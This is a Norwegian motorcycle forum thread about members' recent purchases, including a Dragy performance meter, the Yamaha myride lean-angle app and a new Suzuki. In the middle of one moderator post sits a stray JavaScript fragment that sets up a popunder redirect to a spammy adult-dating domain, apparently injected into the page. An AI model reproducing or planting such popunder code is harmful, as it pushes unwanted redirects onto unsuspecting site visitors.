Hva har du kjøpt i dag?

... om deler, tilbehør, utstyr, renhold, MC-forsikring, kjøreklær osv. til MC, fører og passasjer.
Brukeravatar
Audi Mannen
Innlegg: 767
Registrert: 23 mai 2017, 14:13
Motorsykkelen din: Ducati Multistrada V4S
Sted: Ytre Nordmøre

Re: Hva har du kjøpt i dag?

Legg inn av Audi Mannen »

Det kan hende de boltene bør skiftes ut ja, men da vet jeg hvem som får ordren.

Fikk noe nytt i postkassa i går også... det er farlig med for mye innetid og rolige dager på arbeid med alt for mye nettsurfing.
Gikk til innkjøp av en slik: https://dragymotorsports.com/ .
Mest planlagt brukt i bil for min del.. Må si jeg ser fram til tørre veier slik at man kan få testet litt 0-50 og 0-80km/t.

Kan kategoriseres under leketøy.
Ducati Multistrada V4S - 2021

Brukeravatar
oivindg
Innlegg: 885
Registrert: 20 nov 2019, 21:45
Motorsykkelen din: BMW R1200R (2011)
Sted: Kongsberg

Re: Hva har du kjøpt i dag?

Legg inn av oivindg »

Audi Mannen skrev: 28 jan 2021, 11:34 Det kan hende de boltene bør skiftes ut ja, men da vet jeg hvem som får ordren.

Fikk noe nytt i postkassa i går også... det er farlig med for mye innetid og rolige dager på arbeid med alt for mye nettsurfing.
Gikk til innkjøp av en slik: https://dragymotorsports.com/ .
Mest planlagt brukt i bil for min del.. Må si jeg ser fram til tørre veier slik at man kan få testet litt 0-50 og 0-80km/t.

Kan kategoriseres under leketøy.
Fin den der. Jeg har en VBox Sport som jeg har lekt meg litt med. Hadde nok kjøpt Dragy i stedet hvis den hadde vært i salg den gangen.
Øivind

Min 2011 BMW R1200R - 2021 blir første hele sesong med lappen. Gleder meg!

Brukeravatar
Bjerknez
Innlegg: 22923
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Hva har du kjøpt i dag?

Legg inn av Bjerknez »

Ikke akkurat MC relatert... men jeg har bestillt til sammen 250 meter med silikonkabler :redface

Brukeravatar
Audi Mannen
Innlegg: 767
Registrert: 23 mai 2017, 14:13
Motorsykkelen din: Ducati Multistrada V4S
Sted: Ytre Nordmøre

Re: Hva har du kjøpt i dag?

Legg inn av Audi Mannen »

oivindg skrev: 28 jan 2021, 12:07
Audi Mannen skrev: 28 jan 2021, 11:34 Det kan hende de boltene bør skiftes ut ja, men da vet jeg hvem som får ordren.

Fikk noe nytt i postkassa i går også... det er farlig med for mye innetid og rolige dager på arbeid med alt for mye nettsurfing.
Gikk til innkjøp av en slik: https://dragymotorsports.com/ .
Mest planlagt brukt i bil for min del.. Må si jeg ser fram til tørre veier slik at man kan få testet litt 0-50 og 0-80km/t.

Kan kategoriseres under leketøy.
Fin den der. Jeg har en VBox Sport som jeg har lekt meg litt med. Hadde nok kjøpt Dragy i stedet hvis den hadde vært i salg den gangen.
Vbox har jo vært "the one to have" helt fram til Dragy kom og gjorde det litt mere akseptabelt enn å blåse mange tunsen på slikt. Prismessig er den et hav billigere og tester viser at den er like nøyaktig. Morro leketøy og gleder meg til å teste bilen når varmen og veigrepet kommer. Er spent på hvor langt ned jeg kommer.
Ducati Multistrada V4S - 2021

Brukeravatar
kjellv
Moderator
Innlegg: 6956
Registrert: 14 aug 2012, 23:16
Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
Sted: Molde
Kontakt:

Re: Hva har du kjøpt i dag?

Legg inn av kjellv »

Audi Mannen skrev: 28 jan 2021, 12:45
oivindg skrev: 28 jan 2021, 12:07
Audi Mannen skrev: 28 jan 2021, 11:34 Det kan hende de boltene bør skiftes ut ja, men da vet jeg hvem som får ordren.

Fikk noe nytt i postkassa i går også... det er farlig med for mye innetid og rolige dager på arbeid med alt for mye nettsurfing.
Gikk til innkjøp av en slik: https://dragymotorsports.com/ .
Mest planlagt brukt i bil for min del.. Må si jeg ser fram til tørre veier slik at man kan få testet litt 0-50 og 0-80km/t.

Kan kategoriseres under leketøy.
Fin den der. Jeg har en VBox Sport som jeg har lekt meg litt med. Hadde nok kjøpt Dragy i stedet hvis den hadde vært i salg den gangen.
Vbox har jo vært "the one to have" helt fram til Dragy kom og gjorde det litt mere akseptabelt enn å blåse mange tunsen på slikt. Prismessig er den et hav billigere og tester viser at den er like nøyaktig. Morro leketøy og gleder meg til å teste bilen når varmen og veigrepet kommer. Er spent på hvor langt ned jeg kommer.
Jeg har appen "myride" fra Yamaha på telefonen, denne har også en del artige funksjoner. Logger akselerasjon, nedleggsvinkler og mye annet. Finnes i google play og app store.
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Rha
Innlegg: 287
Registrert: 04 jul 2017, 22:26
Motorsykkelen din: yamaha mt09 tracer 2017

Re: Hva har du kjøpt i dag?

Legg inn av Rha »

Har prøvd den. Fikk 35 grader nedlegg i bil. Hehe
Nå har jeg surmult og vært sur som fa** i to år og plutselig ble jeg positiv.....

Brukeravatar
Bjerknez
Innlegg: 22923
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Hva har du kjøpt i dag?

Legg inn av Bjerknez »

Rha skrev: 29 jan 2021, 07:55 Har prøvd den. Fikk 35 grader nedlegg i bil. Hehe
Dæven... Kneskrap? :knegg

Brukeravatar
Audi Mannen
Innlegg: 767
Registrert: 23 mai 2017, 14:13
Motorsykkelen din: Ducati Multistrada V4S
Sted: Ytre Nordmøre

Re: Hva har du kjøpt i dag?

Legg inn av Audi Mannen »

Rha skrev: 29 jan 2021, 07:55 Har prøvd den. Fikk 35 grader nedlegg i bil. Hehe
Slappe dempere på kjerra du da? Suzuki Jimny kanskje.. :lol Den appen måler vel bare fart kombinert med noen form for g-meter i telefonen og på en mc tilsier vel summen av det hva du må ha av nedlegg vil jeg tro. Men kun spekulasjoner fra min side.
Ducati Multistrada V4S - 2021

Brukeravatar
bm
Innlegg: 694
Registrert: 08 mai 2005, 22:54
Motorsykkelen din: GoldWing 1500 SE, 97 mod

Re: Hva har du kjøpt i dag?

Legg inn av bm »

Har også testet denne appen. Ble imponert med 62 grader nedlegg på Wingen !!!
Teste litt ut og det ser ut som om appen bruker gps for kalkulasjon av nedlegg. Dette da nedlegg slutter å måle når jeg mister gps signal, tuneller osv..
Kan alt om ingeting, men ingeting om alt.....
Ville helt kjørt MC nå....

Brukeravatar
Snekker.edvin
Innlegg: 494
Registrert: 30 des 2017, 23:30
Motorsykkelen din: Yamaha TDM 850

Re: Hva har du kjøpt i dag?

Legg inn av Snekker.edvin »

Bruker den appen ofte. På begynnelsen hadde også noen rare vinkler. Der er veldig viktig med plassering av telefon. Appen bruker g sensor på telefon og må plasseres sentrert på styren (best på bensin tanken).
Feil plassering på styreendene. Du har en vinkel når du legge MC i svingene og i tillegg den registrere styres vinkel

Brukeravatar
Snekker.edvin
Innlegg: 494
Registrert: 30 des 2017, 23:30
Motorsykkelen din: Yamaha TDM 850

Re: Hva har du kjøpt i dag?

Legg inn av Snekker.edvin »

GPS brukes til 0-100-0 oppmåling

Brukeravatar
kjellv
Moderator
Innlegg: 6956
Registrert: 14 aug 2012, 23:16
Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
Sted: Molde
Kontakt:

Re: Hva har du kjøpt i dag?

Legg inn av kjellv »

Snekker.edvin skrev: 29 jan 2021, 20:48 Bruker den appen ofte. På begynnelsen hadde også noen rare vinkler. Der er veldig viktig med plassering av telefon. Appen bruker g sensor på telefon og må plasseres sentrert på styren (best på bensin tanken).
Feil plassering på styreendene. Du har en vinkel når du legge MC i svingene og i tillegg den registrere styres vinkel
Enig. Har funnet ut at det funker best når telefonen ligger på toppen av tankveska.

Brukeravatar
Bjerknez
Innlegg: 22923
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Hva har du kjøpt i dag?

Legg inn av Bjerknez »

Høres uansett for meg ut som en ganske håpløs app med mer underholdningsverdi enn nytteverdi :)

Brukeravatar
Snekker.edvin
Innlegg: 494
Registrert: 30 des 2017, 23:30
Motorsykkelen din: Yamaha TDM 850

Re: Hva har du kjøpt i dag?

Legg inn av Snekker.edvin »

Bjerknez skrev: 30 jan 2021, 16:16 Høres uansett for meg ut som en ganske håpløs app med mer underholdningsverdi enn nytteverdi :)
Kan du peke mot den riktig med nytteverdien?

Leifenz
Innlegg: 4
Registrert: 26 okt 2020, 22:52
Motorsykkelen din: .

Re: Hva har du kjøpt i dag?

Legg inn av Leifenz »

Kjøpte meg sykkel i går. Litt på impuls... Var innom førde motorsport for å myse og prate litt. Der stod det ein 20 modell suzuki gsxs 750 bak på lageret, fremdels på pallen. Da vart fristelsen litt for stor.
No gjenstår det bare å få lappen i boks!

Svar